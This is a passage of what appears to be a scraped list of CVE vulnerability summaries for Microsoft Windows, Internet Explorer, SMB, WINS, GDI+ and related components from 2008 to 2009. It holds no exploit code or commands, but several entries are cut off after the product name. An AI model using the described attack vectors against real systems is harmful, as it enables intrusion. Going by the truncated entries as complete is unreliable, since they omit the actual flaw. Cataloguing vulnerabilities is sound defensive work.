remote attackers to execute arbitrary code via a crafted WMF image file, aka "GDI+ WMF Integer Overflow Vulnerability." [CVE-2009-2499] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 [CVE-2009-2498] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 and Windows Media Services 9.1 and 2008 do not properly parse malformed headers in Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted (1) .asf, (2) .wmv, or (3) .wma file, aka "Windows Media Header Parsing Invalid Free Vulnerability." [CVE-2009-2494] The Active Template Library (ATL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via vectors related to erroneous free operations after reading a variant from a stream and deleting this variant, aka "ATL Object Type Mismatch Vulnerability." [CVE-2009-2484] Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb.c in VideoLAN VLC media player 0.9.9, when running on Microsoft Windows, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long smb URI in a playlist file. [CVE-2009-2357] The default configuration of TekRADIUS 3.0 uses the sa account to communicate with Microsoft SQL Server, which makes it easier for remote attackers to obtain privileged access to the database and the underlying Windows operating system. [CVE-2009-1930] The Telnet service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote Telnet servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, aka "Telnet Credential Reflection Vulnerability," a related issue to CVE-2000-0834. [CVE-2009-1929] Heap-based buffer overflow in the Microsoft Terminal Services Client ActiveX control running RDP 6.1 on Windows XP SP2, Vista SP1 or SP2, or Server 2008 Gold or SP2 [CVE-2009-1928] Stack consumption vulnerability in the LDAP service in Active Directory on Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2 [CVE-2009-1926] Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to cause a denial of service (TCP outage) via a series of TCP sessions that have pending data and a (1) small or (2) zero receive window size, and remain in the FIN-WAIT-1 or FIN-WAIT-2 state indefinitely, aka "TCP/IP Orphaned Connections Vulnerability." [CVE-2009-1925] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 does not properly manage state information, which allows remote attackers to execute arbitrary code by sending packets to a listening service, and thereby triggering misinterpretation of an unspecified field as a function pointer, aka "TCP/IP Timestamps Code Execution Vulnerability." [CVE-2009-1924] Integer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 allows remote WINS replication partners to execute arbitrary code via crafted data structures in a packet, aka "WINS Integer Overflow Vulnerability." [CVE-2009-1923] Heap-based buffer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted WINS replication packet that triggers an incorrect buffer-length calculation, aka "WINS Heap Overflow Vulnerability." [CVE-2009-1922] The Message Queuing (aka MSMQ) service for Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP2, and Vista Gold does not properly validate unspecified IOCTL request data from user mode before passing this data to kernel mode, which allows local users to gain privileges via a crafted request, aka "MSMQ Null Pointer Vulnerability." [CVE-2009-1920] The JScript scripting engine 5.1, 5.6, 5.7, and 5.8 in JScript.dll in Microsoft Windows, as used in Internet Explorer, does not properly load decoded scripts into memory before execution, which allows remote attackers to execute arbitrary code via a crafted web site that triggers memory corruption, aka "JScript Remote Code Execution Vulnerability." [CVE-2009-1808] Microsoft Windows XP SP3 allows local users to cause a denial of service (system crash) by making an SPI_SETDESKWALLPAPER SystemParametersInfo call with an improperly terminated pvParam argument, followed by an SPI_GETDESKWALLPAPER SystemParametersInfo call. [CVE-2009-1546] Integer overflow in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows allows remote attackers to execute arbitrary code on a Windows 2000 SP4 system via a crafted AVI file, or cause a denial of service on a Windows XP SP2 or SP3, Server 2003 SP2, Vista Gold, SP1, or SP2, or Server 2008 Gold or SP2 system via a crafted AVI file, aka "AVI Integer Overflow Vulnerability." [CVE-2009-1545] Unspecified vulnerability in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed header in a crafted AVI file, aka "Malformed AVI Header Vulnerability." [CVE-2009-1544] Double free vulnerability in the Workstation service in Microsoft Windows allows remote authenticated users to gain privileges via a crafted RPC message to a Windows XP SP2 or SP3 or Server 2003 SP2 system, or cause a denial of service via a crafted RPC message to a Vista Gold, SP1, or SP2 or Server 2008 Gold or SP2 system, aka "Workstation Service Memory Corruption Vulnerability." [CVE-2009-1539] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 does not properly validate unspecified size fields in QuickTime media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DirectX Size Validation Vulnerability." [CVE-2009-1538] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 performs updates to pointers without properly validating unspecified data values, which allows remote attackers to execute arbitrary code via a crafted QuickTime media file, aka "DirectX Pointer Validation Vulnerability." [CVE-2009-1537] Unspecified vulnerability in the QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted QuickTime media file, as exploited in the wild in May 2009, aka "DirectX NULL Byte Overwrite Vulnerability." [CVE-2009-1533] Buffer overflow in the Works for Windows document converters in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, Office 2007 SP1, and Works 8.5 and 9 allows remote attackers to execute arbitrary code via a crafted Works .wps file that triggers memory corruption, aka "File Converter Buffer Overflow Vulnerability." [CVE-2009-1532] Microsoft Internet Explorer 8 for Windows XP SP2 and SP3 [CVE-2009-1531] Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1530] Use-after-free vulnerability in Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1529] Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1528] Microsoft Internet Explorer 6 and 7 for Windows XP SP2 and SP3 [CVE-2009-1511] GDI+ in Microsoft Windows XP SP3 allows remote attackers to cause a denial of service (infinite loop) via a PNG file that contains a certain large btChunkLen value. [CVE-2009-1335] Microsoft Internet Explorer 7 and 8 on Windows XP and Vista allows remote attackers to cause a denial of service (application hang) via a large document composed of unprintable characters, aka MSRC 9011jr. [CVE-2009-1331] Integer overflow in Microsoft Windows Media Player (WMP) 11.0.5721.5260 allows remote attackers to cause a denial of service (application crash) via a crafted .mid file, as demonstrated by crash.mid. [CVE-2009-1217] Off-by-one error in the GpFont::SetData function in gdiplus.dll in Microsoft GDI+ on Windows XP allows remote attackers to cause a denial of service (stack corruption and application termination) via a crafted EMF file that triggers an integer overflow, as demonstrated by voltage-exploit.emf, aka the "Microsoft GdiPlus EMF GpFont.SetData integer overflow." [CVE-2009-1216] Multiple unspecified vulnerabilities in (1) unlzh.c and (2) unpack.c in the gzip libraries in Microsoft Windows Server 2008, Windows Services for UNIX 3.0 and 3.5, and the Subsystem for UNIX-based Applications (SUA) [CVE-2009-1141] Microsoft Internet Explorer 6 for Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via unspecified DHTML function calls related to a tr element and the "insertion, deletion and attributes of a table cell," which trigger memory corruption when the window is destroyed, aka "DHTML Object Memory Corruption Vulnerability." [CVE-2009-1139] Memory leak in the LDAP service in Active Directory on Microsoft Windows 2000 SP4 and Server 2003 SP2, and Active Directory Application Mode (ADAM) on Windows XP SP2 and SP3 and Server 2003 SP2, allows remote attackers to cause a denial of service (memory consumption and service outage) via (1) LDAP or (2) LDAPS requests with unspecified OID filters, aka "Active Directory Memory Leak Vulnerability." [CVE-2009-1138] The LDAP service in Active Directory on Microsoft Windows 2000 SP4 does not properly free memory for LDAP and LDAPS requests, which allows remote attackers to execute arbitrary code via a request that uses hexadecimal encoding, whose associated memory is not released, related to a "DN AttributeValue," aka "Active Directory Invalid Free Vulnerability." NOTE: this issue is probably a memory leak. [CVE-2009-1133] Heap-based buffer overflow in Microsoft Remote Desktop Connection (formerly Terminal Services Client) running RDP 5.0 through 6.1 on Windows, and Remote Desktop Connection Client for Mac 2.0, allows remote attackers to execute arbitrary code via unspecified parameters, aka "Remote Desktop Connection Heap Overflow Vulnerability." [CVE-2009-1132] Heap-based buffer overflow in the Wireless LAN AutoConfig Service (aka Wlansvc) in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed wireless frame, aka "Wireless Frame Parsing Remote Code Execution Vulnerability." [CVE-2009-1127] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not correctly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k NULL Pointer Dereferencing Vulnerability." [CVE-2009-1126] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate the user-mode input associated with the editing of an unspecified desktop parameter, which allows local users to gain privileges via a crafted application, aka "Windows Desktop Parameter Edit Vulnerability." [CVE-2009-1125] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application, aka "Windows Driver Class Registration Vulnerability." [CVE-2009-1124] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate user-mode pointers in unspecified error conditions, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Pointer Validation Vulnerability." [CVE-2009-1123] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate changes to unspecified kernel objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Desktop Vulnerability." [CVE-2009-1122] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.0 on Windows 2000 SP4 does not properly decode URLs, which allows remote attackers to bypass authentication, and possibly read or create files, via a crafted HTTP request, aka "IIS 5.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1535. [CVE-2009-1043] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors triggered by clicking on a link, as demonstrated by Nils during a PWN2OWN competition at CanSecWest 2009. [CVE-2009-0568] The RPC Marshalling Engine (aka NDR) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly maintain its internal state, which allows remote attackers to overwrite arbitrary memory locations via a crafted RPC message that triggers incorrect pointer reading, related to "IDL interfaces containing a non-conformant varying array" and FC_SMVARRAY, FC_LGVARRAY, FC_VARIABLE_REPEAT, and FC_VARIABLE_OFFSET, aka "RPC Marshalling Engine Vulnerability." [CVE-2009-0555] Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly process Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted audio file that uses the Windows Media Speech codec, aka "Windows Media Runtime Voice Sample Rate Vulnerability." [CVE-2009-0554] Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0553] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0552] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 on Windows XP SP2 and SP3, and 6 on Windows Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0551] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 does not properly handle transition errors in a request for one HTTP document followed by a request for a second HTTP document, which allows remote attackers to execute arbitrary code via vectors involving (1) multiple crafted pages on a web site or (2) a web page with crafted inline content such as banner advertisements, aka "Page Transition Memory Corruption Vulnerability." [CVE-2009-0550] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 [CVE-2009-0341] The shell32 module in Microsoft Internet Explorer 7.0 on Windows XP SP3 might allow remote attackers to execute arbitrary code via a long VALUE attribute in an INPUT element, possibly related to a stack consumption vulnerability. [CVE-2009-0320] Microsoft Windows XP, Server 2003 and 2008, and Vista exposes I/O activity measurements of all processes, which allows local users to obtain sensitive information, as demonstrated by reading the I/O Other Bytes column in Task Manager (aka taskmgr.exe) to estimate the number of characters that a different user entered at a runas.exe password prompt, related to a "benchmarking attack." [CVE-2009-0244] Directory traversal vulnerability in the OBEX FTP Service in the Microsoft Bluetooth stack in Windows Mobile 6 Professional, and probably Windows Mobile 5.0 for Pocket PC and 5.0 for Pocket PC Phone Edition, allows remote authenticated users to list arbitrary directories, and create or read arbitrary files, via a .. (dot dot) in a pathname. NOTE: this can be leveraged for code execution by writing to a Startup folder. [CVE-2009-0243] Microsoft Windows does not properly enforce the Autorun and NoDriveTypeAutoRun registry values, which allows physically proximate attackers to execute arbitrary code by (1) inserting CD-ROM media, (2) inserting DVD media, (3) connecting a USB device, and (4) connecting a Firewire device [CVE-2009-0239] Cross-site scripting (XSS) vulnerability in Windows Search 4.0 for Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted file that appears in a preview in a search result, aka "Script Execution in Windows Search Vulnerability." [CVE-2009-0235] Stack-based buffer overflow in the Word 97 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted Word 97 file that triggers memory corruption, related to use of inconsistent integer data sizes for an unspecified length field, aka "WordPad Word 97 Text Converter Stack Overflow Vulnerability." [CVE-2009-0234] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 does not properly cache crafted DNS responses, which makes it easier for remote attackers to predict transaction IDs and poison caches by sending many crafted DNS queries that trigger "unnecessary lookups," aka "DNS Server Response Validation Vulnerability." [CVE-2009-0233] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not reuse cached DNS responses in all applicable situations, which makes it easier for remote attackers to predict transaction IDs and poison caches by simultaneously sending crafted DNS queries and responses, aka "DNS Server Query Validation Vulnerability." [CVE-2009-0232] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2009-0231] The Embedded OpenType (EOT) Font Engine (T2EMBED.DLL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table in a data record that triggers an integer truncation and a heap-based buffer overflow, aka "Embedded OpenType Font Heap Overflow Vulnerability." [CVE-2009-0230] The Windows Print Spooler in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows remote authenticated users to gain privileges via a crafted RPC message that triggers loading of a DLL file from an arbitrary directory, aka "Print Spooler Load Library Vulnerability." [CVE-2009-0229] The Windows Printing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows local users to read arbitrary files via a crafted separator page, aka "Print Spooler Read File Vulnerability." [CVE-2009-0228] Stack-based buffer overflow in the EnumeratePrintShares function in Windows Print Spooler Service (win32spl.dll) in Microsoft Windows 2000 SP4 allows remote printer servers to execute arbitrary code via a a crafted ShareName in a response to an RPC request, related to "printing data structures," aka "Buffer Overflow in Print Spooler Vulnerability." [CVE-2009-0202] Array index error in FL21WIN.DLL in the PowerPoint Freelance Windows 2.1 Translator in Microsoft PowerPoint 2000 and 2002 allows remote attackers to execute arbitrary code via a Freelance file with unspecified "layout information" that triggers a heap-based buffer overflow. [CVE-2009-0119] Buffer overflow in Microsoft Windows XP SP3 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a crafted .chm file. [CVE-2009-0094] The WINS server in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 does not restrict registration of the (1) "wpad" and (2) "isatap" NetBIOS names, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) and Intra-Site Automatic Tunnel Addressing Protocol (ISATAP) features, and conduct man-in-the-middle attacks by spoofing a proxy server or ISATAP route, by registering one of these names in the WINS database, aka "WPAD WINS Server Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0093] Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not restrict registration of the "wpad" hostname, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) feature, and conduct man-in-the-middle attacks by spoofing a proxy server, via a Dynamic Update request for this hostname, aka "DNS Server Vulnerability in WPAD Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0089] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Vista Gold allows remote web servers to impersonate arbitrary https web sites by using DNS spoofing to "forward a connection" to a different https web site that has a valid certificate matching its own domain name, but not a certificate matching the domain name of the host requested by the user, aka "Windows HTTP Services Certificate Name Mismatch Vulnerability." [CVE-2009-0087] Unspecified vulnerability in the Word 6 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 [CVE-2009-0086] Integer underflow in Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote HTTP servers to execute arbitrary code via crafted parameter values in a response, related to error handling, aka "Windows HTTP Services Integer Underflow Vulnerability." [CVE-2009-0085] The Secure Channel (aka SChannel) authentication component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008, when certificate authentication is used, does not properly validate the client's key exchange data in Transport Layer Security (TLS) handshake messages, which allows remote attackers to spoof authentication by crafting a TLS packet based on knowledge of the certificate but not the private key, aka "SChannel Spoofing Vulnerability." [CVE-2009-0083] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 does not properly handle invalid pointers, which allows local users to gain privileges via an application that triggers use of a crafted pointer, aka "Windows Kernel Invalid Pointer Vulnerability." [CVE-2009-0082] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate handles, which allows local users to gain privileges via a crafted application that triggers unspecified "actions," aka "Windows Kernel Handle Validation Vulnerability." [CVE-2009-0081] The graphics device interface (GDI) implementation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate input received from user mode, which allows remote attackers to execute arbitrary code via a crafted (1) Windows Metafile (aka WMF) or (2) Enhanced Metafile (aka EMF) image file, aka "Windows Kernel Input Validation Vulnerability." [CVE-2009-0079] The RPCSS service in Microsoft Windows XP SP2 and SP3 and Server 2003 SP1 and SP2 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows RPCSS Service Isolation Vulnerability." [CVE-2009-0078] The Windows Management Instrumentation (WMI) provider in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows WMI Service Isolation Vulnerability." [CVE-2008-6819] win32k.sys in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (system crash) via vectors related to CreateWindow, TranslateMessage, and DispatchMessage, possibly a race condition between threads, a different vulnerability than CVE-2008-1084. NOTE: some of these details are obtained from third party information. [CVE-2008-6194] Memory leak in the DNS server in Microsoft Windows allows remote attackers to cause a denial of service (memory consumption) via DNS packets. NOTE: this issue reportedly exists because of an incorrect fix for CVE-2007-3898. [CVE-2008-5828] Microsoft Windows Live Messenger Client 8.5.1 and earlier, when MSN Protocol Version 15 (MSNP15) is used over a NAT session, allows remote attackers to discover intranet IP addresses and port numbers by reading the (1) IPv4InternalAddrsAndPorts, (2) IPv4Internal-Addrs, and (3) IPv4Internal-Port header fields. [CVE-2008-5823] An ActiveX control in prtstb06.dll in Microsoft Money 2006, when used with WScript in Windows Script Host (WSH) on Windows Vista, allows remote attackers to cause a denial of service (access violation and application crash) via a zero value for the Startup property. [CVE-2008-5750] Argument injection vulnerability in Microsoft Internet Explorer 8 beta 2 on Windows XP SP3 allows remote attackers to execute arbitrary commands via the --renderer-path option in a chromehtml: URI. [CVE-2008-5745] Integer overflow in quartz.dll in the DirectShow framework in Microsoft Windows Media Player (WMP) 9, 10, and 11, including 11.0.5721.5260, allows remote attackers to cause a denial of service (application crash) via a crafted (1) WAV, (2) SND, or (3) MID file. NOTE: this has been incorrectly reported as a code-execution vulnerability. NOTE: it is not clear whether this issue is related to CVE-2008-4927. [CVE-2008-5232] Buffer overflow in the CallHTMLHelp method in the Microsoft Windows Media Services ActiveX control in nskey.dll 4.1.00.3917 in Windows Media Services on Microsoft Windows NT and 2000, and Avaya Media and Message Application servers, allows remote attackers to execute arbitrary code via a long argument. NOTE: the provenance of this information is unknown [CVE-2008-5229] Stack-based buffer overflow in Microsoft Device IO Control in iphlpapi.dll in Microsoft Windows Vista Gold and SP1 allows local users in the Network Configuration Operator group to gain privileges or cause a denial of service (system crash) via a large invalid PrefixLength to the CreateIpForwardEntry2 method, as demonstrated by a "route add" command. NOTE: this issue might not cross privilege boundaries. [CVE-2008-5179] Unspecified vulnerability in Microsoft Office Communications Server (OCS), Office Communicator, and Windows Live Messenger allows remote attackers to cause a denial of service (crash) via a crafted Real-time Transport Control Protocol (RTCP) receiver report packet. [CVE-2008-5112] The LDAP server in Active Directory in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 responds differently to a failed bind attempt depending on whether the user account exists and is permitted to login, which allows remote attackers to enumerate valid usernames via a series of LDAP bind requests, as demonstrated by ldapuserenum. [CVE-2008-5044] Race condition in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (crash or hang) via a multi-threaded application that makes many calls to UnhookWindowsHookEx while certain other desktop activity is occurring. [CVE-2008-4927] Microsoft Windows Media Player (WMP) 9.0 through 11 allows user-assisted attackers to cause a denial of service (application crash) via a malformed (1) MIDI or (2) DAT file, related to "MThd Header Parsing." NOTE: the provenance of this information is unknown [CVE-2008-4841] The WordPad Text Converter for Word 97 files in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted (1) .doc, (2) .wri, or (3) .rtf Word 97 file that triggers memory corruption, as exploited in the wild in December 2008. NOTE: As of 20081210, it is unclear whether this vulnerability is related to a WordPad issue disclosed on 20080925 with a 2008-crash.doc.rar example, but there are insufficient details to be sure. [CVE-2008-4835] SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans2 request, related to "insufficiently validating the buffer size," aka "SMB Validation Remote Code Execution Vulnerability." [CVE-2008-4834] Buffer overflow in SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans request, aka "SMB Buffer Overflow Remote Code Execution Vulnerability." [CVE-2008-4609] The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrated by sockstress. [CVE-2008-4510] Microsoft Windows Vista Home and Ultimate Edition SP1 and earlier allows local users to cause a denial of service (page fault and system crash) via multiple attempts to access a virtual address in a PAGE_NOACCESS memory page. [CVE-2008-4327] gdiplus.dll in GDI+ in Microsoft Windows XP SP3 does not properly handle crafted .ico files, which allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a certain crash.ico file on a web site, and allows user-assisted attackers to cause a denial of service (divide-by-zero error and persistent application crash) via this crash.ico file on the desktop, a different vulnerability than CVE-2007-2237. [CVE-2008-4323] Windows Explorer in Microsoft Windows XP SP3 allows user-assisted attackers to cause a denial of service (application crash) via a crafted .ZIP file. [CVE-2008-4295] Microsoft Windows Mobile 6.0 on HTC Wiza 200 and HTC MDA 8125 devices does not properly handle the first attempt to establish a Bluetooth connection to a peer with a long name, which allows remote attackers to cause a denial of service (device reboot) by configuring a Bluetooth device with a long hci name and (1) connecting directly to the Windows Mobile system or (2) waiting for the Windows Mobile system to scan for nearby devices. [CVE-2008-4269] The search-ms protocol handler in Windows Explorer in Microsoft Windows Vista Gold and SP1 and Server 2008 uses untrusted parameter data obtained from incorrect parsing, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "Windows Search Parsing Vulnerability." [CVE-2008-4268] The Windows Search component in Microsoft Windows Vista Gold and SP1 and Server 2008 does not properly free memory during a save operation for a Windows Search file, which allows remote attackers to execute arbitrary code via a crafted saved-search file, aka "Windows Saved Search Vulnerability." [CVE-2008-4261] Stack-based buffer overflow in Microsoft Internet Explorer 5.01 SP4, 6 SP1 on Windows 2000, and 6 on Windows XP and Server 2003 does not properly handle extraneous data associated with an object embedded in a web page, which allows remote attackers to execute arbitrary code via crafted HTML tags that trigger memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2008-4255] Heap-based buffer overflow in mscomct2.ocx (aka Windows Common ActiveX control or Microsoft Animation ActiveX control) in Microsoft Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2, and Office Project 2003 SP3 and 2007 Gold and SP1 allows remote attackers to execute arbitrary code via an AVI file with a crafted stream length, which triggers an "allocation error" and memory corruption, aka "Windows Common AVI Parsing Overflow Vulnerability." [CVE-2008-4250] The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka "Server Service Vulnerability." [CVE-2008-4127] Mshtml.dll in Microsoft Internet Explorer 7 Gold 7.0.5730 and 8 Beta 8.0.6001 on Windows XP SP2 allows remote attackers to cause a denial of service (failure of subsequent image rendering) via a crafted PNG file, related to an infinite loop in the CDwnTaskExec::ThreadExec function. [CVE-2008-4114] srv.sys in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via an SMB WRITE_ANDX packet with an offset that is inconsistent with the packet size, related to "insufficiently validating the buffer size," as demonstrated by a request to the \PIPE\lsarpc named pipe, aka "SMB Validation Denial of Service Vulnerability." [CVE-2008-4071] A certain ActiveX control in Adobe Acrobat 9, when used with Microsoft Windows Vista and Internet Explorer 7, allows remote attackers to cause a denial of service (browser crash) via an src property value with an invalid acroie:// URL. [CVE-2008-4038] Buffer underflow in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a Server Message Block (SMB) request that contains a filename with a crafted length, aka "SMB Buffer Underflow Vulnerability." [CVE-2008-4037] Microsoft Windows 2000 Gold through SP4, XP Gold through SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote SMB servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, 